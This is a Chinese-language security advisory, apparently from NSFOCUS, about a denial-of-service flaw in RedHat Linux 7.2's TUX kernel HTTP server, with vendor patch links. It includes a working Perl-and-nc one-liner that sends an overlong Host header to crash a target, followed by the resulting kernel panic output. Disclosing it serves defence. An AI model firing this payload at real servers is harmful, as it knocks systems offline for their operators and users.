首页 -> 安全研究

安全研究

安全漏洞
RH Linux Tux HTTPD 拒绝服务漏洞

发布日期:2001-11-05
更新日期:2001-11-07

受影响系统:

TUX-2.1.0-2
   - RedHat Linux 7.2(Kernel 2.4.7-10)
   - RedHat Linux 7.2(Kernel 2.4.9-7)
描述:

Tux 是内核空间的HTTP Server,可以最大地提高性能,能够与用户空间的HTTP
Server,如Apache同时工作,缺省情况下是禁止的。该软件存在一个安全问题,可能
导致拒绝服务。

通过向远程服务器发送超长的“Host:”头,就可以导致远程服务器拒绝服务,只有重
新启动才能恢复正常工作。

<*来源:Aiden ORawe (a.orawe@ntlworld.com
  链接:http://archives.neohapsis.com/archives/bugtraq/2001-11/0020.html
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!


Aiden ORawe (a.orawe@ntlworld.com)提供了下列测试方法:

perl -e "print qq(GET / HTTP/1.0\nAccept: */*\nHost: ) . qq(A) x 6000 .
qq(\n)" |nc <ip address> <dest_port>

这将会导致远程主机发生下列信息:

Code: Bad EIP Value.
(0)Kernel Panic: Aiee, killing interrupt handler!
In interrupt handler - not syncing!


建议:

临时解决方法:

如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:

* 禁止运行Tux

厂商补丁:

RedHat已经为此发布了一个安全公告(RHSA-2001:142-15)和相应补丁:
http://www.redhat.com/support/errata/RHSA-2001-142.html

补丁下载地址:

Red Hat Linux 7.2:

SRPMS:
ftp://updates.redhat.com/7.2/en/os/SRPMS/kernel-2.4.9-13.src.rpm

athlon:
ftp://updates.redhat.com/7.2/en/os/athlon/kernel-2.4.9-13.athlon.rpm
ftp://updates.redhat.com/7.2/en/os/athlon/kernel-smp-2.4.9-13.athlon.rpm

i386:
ftp://updates.redhat.com/7.2/en/os/i386/kernel-2.4.9-13.i386.rpm
ftp://updates.redhat.com/7.2/en/os/i386/kernel-source-2.4.9-13.i386.rpm
ftp://updates.redhat.com/7.2/en/os/i386/kernel-headers-2.4.9-13.i386.rpm
ftp://updates.redhat.com/7.2/en/os/i386/kernel-doc-2.4.9-13.i386.rpm
ftp://updates.redhat.com/7.2/en/os/i386/kernel-BOOT-2.4.9-13.i386.rpm

i586:
ftp://updates.redhat.com/7.2/en/os/i586/kernel-2.4.9-13.i586.rpm
ftp://updates.redhat.com/7.2/en/os/i586/kernel-smp-2.4.9-13.i586.rpm

i686:
ftp://updates.redhat.com/7.2/en/os/i686/kernel-2.4.9-13.i686.rpm
ftp://updates.redhat.com/7.2/en/os/i686/kernel-debug-2.4.9-13.i686.rpm
ftp://updates.redhat.com/7.2/en/os/i686/kernel-smp-2.4.9-13.i686.rpm
ftp://updates.redhat.com/7.2/en/os/i686/kernel-enterprise-2.4.9-13.i686.rpm

可使用下列命令安装补丁:
rpm -Fvh [文件名]

浏览次数:5166
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障